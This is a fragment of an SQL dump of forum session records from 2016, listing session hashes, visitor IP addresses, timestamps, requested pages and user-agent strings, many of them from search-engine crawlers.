('5124509b5f08f58b7023650735ebc08a', 0, '157.55.39.130', '23f3103f44bc3badcba53554e5e4cb6d', 1473917651, '/archive/index.php/t-1723.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5009fed8a0f95df13b6f94002ded897c', 173, '216.164.19.30', '4f65afbd1a55b9982b30e5ab12e13fb9', 1473886809, '/index.php', 'Mozilla/5.0 (compatible; Windows NT 6.4; SV3; WOW64; IA64, X11; en-US) AppleWebKit/9537.53+ Chrome/5', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a6e837feb292630c27adf373b90c5d39', 0, '176.15.254.249', '5409f078cb0e85b035e125622edd790e', 1473889618, '/search.php?do=getnew', 'Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2876 Mobile Safari/', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8b35a38b7c76f6228bb36f7c0022af6', 0, '104.168.62.77', '6e75e023fb3e731349d143476d831d2c', 1473892134, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7b4481664742afa8840a8a486691836', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473895252, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('374fb274c6ae7f8297bf6339aabe60ed', 0, '172.68.10.203', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1473905023, '/archive/index.php/t-2355.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('0fb06687d79d4093bc9414a3d8519f1c', 0, '23.106.195.8', '13fe57cbee6a744a5eb9b9e79c89c17b', 1473905481, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('670b19c75a426e23d5256ce62c8f3c13', 0, '40.77.167.20', 'c5490a5a8e1813ac25cf9e19091dcb85', 1473915930, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a1a66f42e88bbb9a86103bc821341b36', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473938036, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('f523f4e05db02bcb38757aeae913ef3c', 0, '46.99.65.227', '553ba281ecca622fa9d63933284d0754', 1473939747, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7455299984b8a51c1f3d9f54064c0693', 0, '14.97.255.211', '4194e1c6f5e8d6e772715d4ae3f2878c', 1473940318, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('216f2226b40f370df2dce39abf9b7230', 0, '172.68.11.203', 'df997979fc48ce1bdff4a9183702f384', 1473954176, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6cdb9a31f39cd9659c8ac15df9d477de', 0, '23.108.13.59', 'bcd099c264ae94f8f8d549fb867918b1', 1473956939, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f094b3f0f4c7e96aecda181297752d6f', 0, '160.165.160.158', '22ad4362f2fec1742e27588c2665ad02', 1473977713, '/showthread.php?p=2928', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18e16a7a7015027a382c3c2c6d5798f4', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1473983651, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('dffca126369729b9f0173a3763162d24', 0, '209.126.67.38', '38b91e46525e7e60040a44a18ce70ea8', 1474315019, '/index.php/admin/', '', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b8cc9f086be0b00d197febc3a2febed0', 0, '141.8.143.137', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1474004898, '/index.php', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4339be0ad7064f8b13336e13779c06d7', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474026648, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('cb49cf7e2af1dc26fdd782228117bb5d', 0, '62.43.5.20', '39554c0cf0f9b8ce8b27dc674cc57b81', 1474628368, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e893f5c921945ac993b922f2b5166594', 0, '23.236.247.10', 'c574f543afb48562177b517776227915', 1474043344, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a82d527899c69e1b168fcab04627d0f0', 0, '24.37.77.51', '87f718033394bcc14853f12220969dfe', 1474043794, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('43c0450842ec240427a13b4f1c8cfab2', 0, '66.249.64.112', '881de0811167d68e6f4733be9b8109c2', 1475109957, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('7df05e86479576cd2c9f94f7f5d88dba', 0, '45.40.43.250', 'd4b447ab663cf57fddd320754af6af36', 1474045141, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3b212bc35929722bef8fec887f424ae1', 0, '198.23.169.233', '587e7886e581e74bb6d8c74766b4fbb3', 1474052540, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4fd181f78ee94fa65368b189ef408604', 0, '172.98.67.82', 'e983fe9b16b3c9099ed9926ed57e834b', 1474055833, '/search.php?do=getdaily', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6b27a207961d324c0d936e91b53cb2c', 0, '157.55.39.67', '23f3103f44bc3badcba53554e5e4cb6d', 1474058510, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9606b9b3362be26125461542bfc00333', 0, '91.219.237.229', '92ede9ec1676d02e9a140cb7666d41ac', 1474058573, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fae8d71fd3463754d0da89acbb783fbb', 0, '207.46.13.82', '5e207e311e22cdc3b2095126a922fa93', 1474068979, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c42310b8361c42da91d45b7acd0af8b', 0, '207.46.13.154', '5e207e311e22cdc3b2095126a922fa93', 1474068999, '/showthread.php?p=2800&mode=threaded', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fad1a2b2c32e2022ea42988f17f6858d', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474072221, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('be7d026ecd4c104deb478955a11b1726', 0, '23.106.70.22', '5efa5087c2ecb500e8b2a48ce9003fe8', 1474079035, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d358b98505ca30d318ebc86e286550f0', 0, '188.146.34.48', '4da2cd858fe098afed17c1f1934f9f18', 1474096470, '/member.php?u=29', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4c36aa9af7efd750f93561dd6c82f1ec', 0, '2a02:598:a::79:', '3c92785f9d2dd5363ab1acc7f75c2d5f', 1474108627, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('38633da42c435bfb5bcf2433f7ab8943', 0, '105.112.23.50', 'f3091b374382ac9533fcd389f883a167', 1474112007, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a7b1a013ede2614040cd969a42d3d191', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474115104, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c4afeefc52b1024731c1d7ee25ab5b91', 0, '2a00:23c4:4641:', 'dc75ed5e6081388dc727ccc52f37e8d3', 1474122959, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4faef6e7349e0f4c545c94099f95207', 0, '151.238.89.63', 'e906e1d5120463a78c17e4be43d9b7a1', 1474123530, '/register.php', 'Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('87454a9fbea92df811da59d5a9100c8a', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474244007, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('180e966447290d671d2497cb08ea3871', 0, '157.55.39.196', '23f3103f44bc3badcba53554e5e4cb6d', 1474246922, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9221578f7084e1c71e5295de0f0c5f9d', 0, '40.77.167.74', 'c5490a5a8e1813ac25cf9e19091dcb85', 1474246925, '/archive/index.php/t-1723.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('2e160851d348070f5b63c5dabbfb9de6', 0, '207.46.13.50', '5e207e311e22cdc3b2095126a922fa93', 1474565869, '/member.php?u=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e15ea378c15e7793d892b1a7631599f3', 0, '23.108.97.95', 'aa76619f9ea42fbf4d0c3fa1a97e110d', 1474247201, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5665e53429f5b81ade6ad1e71a88ec43', 0, '98.143.144.253', 'd0c57afadb830f3b9b8e9b21bc5a8709', 1474248758, '/login.php?do=logout&logouthash=1474248753-e32c39ae0d029c7dccf53c598239a774f668a322', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.272 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('add0c216b5722fe484482c33e58ed4d7', 0, '98.143.144.253', '56d78eefc3c9c129914fda45ad394702', 1474248766, '/login.php?do=logout&logouthash=1474248753-e32c39ae0d029c7dccf53c598239a774f668a322', 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20150101 Firefox/44.0 (Chrome)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d54d93f14c8e9bc561cebd9ab7a0f69', 0, '23.108.97.60', 'fbe518bb5bd4ddbdf9c9f5ce19d00aba', 1474251835, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd434d6eb22276610c92dd674c98e545', 0, '54.175.18.233', 'e0be283989bfbd8dbb15ce2f2f7652de', 1474462093, '/index.php?', 'ltx71 - (http://ltx71.com/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('245a83bcf48fd6f7ba79350377aa8b9b', 0, '124.103.100.73', '16dd2464bf991e97d4278834f54c0ed7', 1474262062, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5d8409e5f33054debbe3a38e37dfaf4b', 0, '185.57.80.197', 'f52a63b6b0daab164b2fa1ce36e65173', 1474265004, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/600.3.10 (KHTML, like Gecko) Version/8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8eb335a66389e551d23763fd174f6d22', 0, '172.68.11.205', '5d5c11f55b90cd049e06ed2c17d99633', 1474286228, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('08079aa34853c29b4dc560c1f88186d7', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474287413, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('23a6080a8bc076aebde31a363ab1fdc2', 0, '172.68.11.206', '44a5b09743bd997debc1d1b2d2c16cf9', 1474291171, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('105b3d669bed18f89f5f854cd5547f87', 0, '172.68.29.187', '5bd98aa921856410cc7849442f7cf23f', 1474298251, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18913d004ce94bdb63d49bce98082b06', 0, '85.118.134.144', 'ef66241c06edffb54d6adfb781c0a4f6', 1474340355, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('178bda3da17d8c38d4f1e21da1407c1b', 0, '2001:41d0:8:e08', '245e8f0122ba677f48555efaa03e149f', 1474323533, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('24bff94775095c4995cbf5acb204c038', 0, '77.174.63.25', '74c9e8c824ae3a49cd2de5d2acc75596', 1474328335, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0f336b954b77b342773f4c515184bdd8', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474330348, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('981dc893a19734041a64a70e0fea79d8', 0, '172.68.59.89', 'a938925ca9403f145c82d10ebc1ecbe1', 1474348794, '/search.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4f17ff66a03819b97d81616e3641ac0e', 0, '103.208.244.199', '214f1a1a1f5d180edb7a86c0093fa209', 1474364672, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('72e761600321823ae86cebb0ad18d206', 0, '107.22.98.181', 'b39573c3254a96e7d8809bc877252410', 1474368419, '/showthread.php?p=2936', 'Mozilla/5.0 (compatible; linkdexbot/2.2; +http://www.linkdex.com/bots/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fc1abc9013be3b87edd8aa2eec219306', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474378302, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2069f1ee36e198c57f31a46aa76be634', 0, '93.73.201.100', 'f65e892e1aed3052c481bb7d5353e8e1', 1474391910, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3dc1b13c6356a70777b7f82c2f34e028', 0, '107.172.163.31', '7f83ba458431c721f1b43b771cdca59d', 1474399510, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5720f4d27c48591ffa9b6d514d547aaa', 0, '45.40.46.67', '6571d7c3fbe881440609725b8bfba433', 1474399793, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d0dc55ae38357ce1a2b3ac9ba3e278a3', 0, '23.105.147.73', '33eb0a427de88dde30c1bee0481329e3', 1474400076, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('21c70be86ba9c2ea106a1bfc67bfeef2', 0, '23.95.2.157', 'b4fd6433550b492c37865eecfa71f236', 1474400379, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aeda2f947c6bd6d7206ed96188c8061f', 0, '192.161.174.26', '82df9d31b17120eb20482f07d21ad25b', 1474401282, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e5402503f4c9529b5b1455bba3246cd2', 0, '88.11.139.75', 'ab1feb97150884e36c2f619b55d1fd59', 1474402298, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('245fd469c322df3563ee97a293b0c029', 0, '23.94.189.40', '54757f073ad5dd3941ccffcfa5b851f0', 1474403796, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('170c59932600d7d23ead02dfade6ed5e', 0, '23.94.164.116', '55237f8e71c01b3eb7e41dc65184a379', 1474404070, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fe2f3db0cebde0f8c088e46614d55361', 0, '23.108.24.203', '087274fee7411327e47e759b60344614', 1474404338, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0de5ba7e0f366850a83fc27f193741d6', 0, '138.128.123.55', '643910d1b9a36f9267b50c8b1f5a25f5', 1474404655, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a366f83af0533a823e3d64d1b779a973', 0, '104.168.35.108', 'fd2484b213d6dbd684875ea9ba410ea6', 1474404884, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ec57c5f8e7c45774399fb4bac9834a33', 0, '45.40.46.2', 'ff3d1ef66cad7bd538f692c50ec7cf5e', 1474405562, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1eb88911bb212e98bf2480904272131', 0, '185.141.25.106', '97222a0e5b3033d69c768656557f0980', 1474408173, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2379.0 Safari', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7d0ab42a1b9e6a70b183560f47c4972d', 0, '192.161.185.75', '88ca673486ff8440555853860a8c548c', 1474420138, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('986ac180401d75fd84ac0b65bf6f93be', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474421105, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a191bf3fd591264011999cd824740051', 0, '185.34.94.7', '81010b41046815ed163517b3daccc63f', 1474421816, '/register.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F/G920FXXU4DPHB Build/MMB29K) AppleWebKit/537.36 (', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('281656993275a0109b32ba0f526a2844', 0, '104.168.70.138', '3b0b5cbf319400ddf944e24885f2cc23', 1474424991, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fdf3de478055ebdac6fac89566b4888b', 0, '104.237.225.84', '8f0eaac39a17c27eae306fd386e126b1', 1474456441, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('70dff135f165877d93a2dd888d4f2ea7', 0, '23.105.150.178', 'ecf7c8d644f0abe746a1646b7b61feea', 1474433686, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aeaec19aa25ab791ea3cad211aa933c2', 0, '23.81.238.14', 'b492dfd03d5b053b29c39529a087c9a0', 1474437995, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('820352923687772ebc39f25273a59803', 0, '212.117.180.21', '42796f38e41051b872b1a46989d15439', 1474440356, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71a178689d8659effd6349840418c092', 0, '213.17.226.13', '860efdd64c6137044b9df1e18bf20e46', 1474449575, '/memberlist.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('53d80e4e6528bacd91503d10d5b6cd4a', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1474464682, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3b60e8e92a92b13ed584079d8ee06b71', 0, '66.249.69.112', 'a938925ca9403f145c82d10ebc1ecbe1', 1474468513, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e1ab68c6d98a04dc2c7e26d3df75cb5', 0, '195.211.23.206', '750d96c8b4e1e54687c1f91e7c498491', 1474479689, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9962e56fe6105393deff38d5302bf6d7', 0, '213.254.130.207', '9cb5e99c81a7af8dba8e75ab17d388a8', 1474481541, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('30c3b502f0747b0e67a7478ff052f9ee', 0, '23.94.58.103', 'c2338fb8d06c49a8a77155626bbb321b', 1474481475, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a7fbdc4d43ae7565b52e1f94679044df', 0, '23.94.175.43', '029f2daee5e9580e313cb1c0a86726ff', 1474482450, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a63252fb3cd0a8af49970f80d14d3087', 0, '149.255.104.183', 'afc7f401c0b29db353a61c3dbf8a1030', 1474482726, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b0d82f78926ee89599cbbac3a8387110', 0, '23.236.240.102', '8943578ed71098265cbaaa0a0c697eaf', 1474483000, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d987dd5baa584fdbc554789a92e6e88a', 0, '23.106.229.52', 'd3a96a7a64ad6ac733a5dceb6b0d5304', 1474483304, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('192f0085997f3078508854daa4f755cd', 0, '104.168.68.38', 'b2352b334729fb75b1d14638a21be762', 1474484208, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
